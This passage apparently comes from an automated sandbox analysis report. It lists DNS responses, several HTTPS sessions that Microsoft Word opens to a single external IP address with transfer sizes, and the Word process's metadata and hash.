Dec 20, 2022 14:08:04.172363997 CET | 8.8.8.8 | 192.168.2.22 | 0x1150 | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:04.202842951 CET | 8.8.8.8 | 192.168.2.22 | 0x1aac | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:09.410435915 CET | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:09.436068058 CET | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:16.630496025 CET | 8.8.8.8 | 192.168.2.22 | 0xc9b | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:16.889527082 CET | 8.8.8.8 | 192.168.2.22 | 0xa51f | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49175 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:02 UTC | 0 | OUT | |
2022-12-20 13:08:02 UTC | 0 | IN | |
2022-12-20 13:08:02 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49176 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:04 UTC | 1 | OUT | |
2022-12-20 13:08:05 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49185 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:21 UTC | 16 | OUT | |
2022-12-20 13:08:21 UTC | 16 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49177 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:10 UTC | 1 | OUT | |
2022-12-20 13:08:10 UTC | 2 | IN | |
2022-12-20 13:08:10 UTC | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49178 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:11 UTC | 3 | OUT | |
2022-12-20 13:08:11 UTC | 3 | IN | |
2022-12-20 13:08:11 UTC | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49179 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:12 UTC | 4 | OUT | |
2022-12-20 13:08:13 UTC | 4 | IN | |
2022-12-20 13:08:13 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49180 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:14 UTC | 12 | OUT | |
2022-12-20 13:08:14 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49181 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:15 UTC | 13 | OUT | |
2022-12-20 13:08:16 UTC | 13 | IN | |
2022-12-20 13:08:16 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49182 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:17 UTC | 14 | OUT | |
2022-12-20 13:08:18 UTC | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49183 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:18 UTC | 15 | OUT | |
2022-12-20 13:08:19 UTC | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49184 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:20 UTC | 15 | OUT | |
2022-12-20 13:08:20 UTC | 16 | IN |
Target ID: | 0 |
Start time: | 14:07:14 |
Start date: | 20/12/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f9d0000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |